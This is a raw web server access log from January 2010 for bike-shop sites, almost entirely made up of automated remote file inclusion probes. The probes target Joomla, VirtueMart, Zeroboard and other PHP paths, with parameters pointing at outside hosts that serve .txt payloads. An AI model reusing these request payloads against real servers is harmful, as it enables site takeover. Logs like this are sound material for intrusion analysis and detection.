67.195.115.254 - - [11/Jan/2010:05:38:12 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
67.195.115.254 - - [11/Jan/2010:05:38:13 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
81.12.13.152 - - [11/Jan/2010:05:49:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [11/Jan/2010:05:49:29 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [11/Jan/2010:05:49:29 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [11/Jan/2010:05:49:29 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.221.91.55 - - [11/Jan/2010:05:55:09 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://avrovulcan.com/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.221.91.55 - - [11/Jan/2010:05:55:09 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://avrovulcan.com/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.221.91.55 - - [11/Jan/2010:05:55:09 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://avrovulcan.com/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.100.249.238 - - [11/Jan/2010:06:02:42 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.simplyski.com//id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
115.100.249.238 - - [11/Jan/2010:06:02:49 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.simplyski.com//id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
115.100.249.238 - - [11/Jan/2010:06:02:50 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.simplyski.com//id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
72.34.235.197 - - [11/Jan/2010:06:09:15 -0800] "GET /logs/access.log%20%20//bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.34.235.197 - - [11/Jan/2010:06:09:15 -0800] "GET /logs//bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.34.235.197 - - [11/Jan/2010:06:09:15 -0800] "GET /bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:10:00 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:10:00 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:10:00 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.221.91.55 - - [11/Jan/2010:06:10:04 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://avrovulcan.com/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:10:05 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:10:05 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:10:05 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:11:58 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:11:58 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:11:58 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:12:02 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:12:02 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:12:02 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:15:52 -0800] "GET /logs/access.log/?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:15:52 -0800] "GET /?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:15:52 -0800] "GET /logs/?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:17:12 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:17:12 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:17:12 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:17:12 -0800] "GET /logs/?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:17:12 -0800] "GET /logs/access.log%20%20/?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:17:12 -0800] "GET /?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:19:06 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:19:06 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:19:07 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:19:09 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:19:09 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:06:19:09 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:24:45 -0800] "GET /logs/access.log//bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:24:45 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:24:45 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:06:25:11 -0800] "GET /main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:06:25:11 -0800] "GET /logs//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:06:25:15 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:06:25:22 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:26:12 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:26:12 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:26:12 -0800] "GET /logs/access.log%20%20//bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:34:52 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:34:52 -0800] "GET /logs/access.log%20%20//bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.45.62 - - [11/Jan/2010:06:34:52 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.34.235.197 - - [11/Jan/2010:06:57:49 -0800] "GET /logs/access.log//bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.100.249.238 - - [11/Jan/2010:07:04:28 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.simplyski.com//bot.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
70.86.67.234 - - [11/Jan/2010:07:12:28 -0800] "GET /logs/access.log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.86.67.234 - - [11/Jan/2010:07:12:28 -0800] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.86.67.234 - - [11/Jan/2010:07:12:28 -0800] "GET /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [11/Jan/2010:07:14:43 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [11/Jan/2010:07:14:44 -0800] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [11/Jan/2010:07:14:44 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.253.195.111 - - [11/Jan/2010:07:17:51 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seagifts.ru//components/com_poll/models/admin/help/lol/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.253.195.111 - - [11/Jan/2010:07:17:51 -0800] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seagifts.ru//components/com_poll/models/admin/help/lol/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.253.195.111 - - [11/Jan/2010:07:17:51 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seagifts.ru//components/com_poll/models/admin/help/lol/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.253.195.111 - - [11/Jan/2010:07:24:13 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seagifts.ru//components/com_poll/models/admin/help/lol/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.129.119.14 - - [11/Jan/2010:07:31:19 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "bicyclestoreshouston.com"
203.253.25.15 - - [11/Jan/2010:07:40:54 -0800] "GET /logs//admin/page-logs.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:07:40:54 -0800] "GET /logs/access.log%20%20//admin/page-logs.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:07:40:54 -0800] "GET /admin/page-logs.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:07:41:14 -0800] "GET /admin/page-logs.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:07:41:14 -0800] "GET /logs/access.log%20%20//admin/page-logs.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:07:41:14 -0800] "GET /logs//admin/page-logs.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [11/Jan/2010:07:50:36 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.100.249.238 - - [11/Jan/2010:07:55:05 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.simplyski.com//bot.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
115.100.249.238 - - [11/Jan/2010:07:55:05 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.simplyski.com//bot.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.115.6.17 - - [11/Jan/2010:07:59:35 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:10:46 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:10:46 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:10:46 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:14:11 -0800] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:14:12 -0800] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:14:13 -0800] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:14:13 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:14:35 -0800] "GET /logs//components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:14:35 -0800] "GET /components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:14:35 -0800] "GET /logs/access.log%20%20//components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:14:41 -0800] "GET /logs//components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:14:42 -0800] "GET /logs/access.log%20%20//components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:14:42 -0800] "GET /components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:15:21 -0800] "GET /logs/access.log//components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:15:21 -0800] "GET /logs//components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:15:22 -0800] "GET /components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:15:24 -0800] "GET /logs/access.log//components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:15:24 -0800] "GET /components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:15:24 -0800] "GET /logs//components/com_virtuemart//errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:15:53 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:15:53 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:15:53 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:16:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:16:39 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:16:39 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.10 - - [11/Jan/2010:08:17:35 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.bicyclestoreshouston.com"
115.100.249.238 - - [11/Jan/2010:08:17:56 -0800] "GET /ask_password.php?dir=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.100.249.238 - - [11/Jan/2010:08:17:57 -0800] "GET /logs//ask_password.php?dir=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.100.249.238 - - [11/Jan/2010:08:17:57 -0800] "GET /logs/access.log%20%20//ask_password.php?dir=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:18:13 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:18:13 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:08:18:13 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:20:15 -0800] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:20:15 -0800] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:20:15 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:21:11 -0800] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:21:17 -0800] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:21:17 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
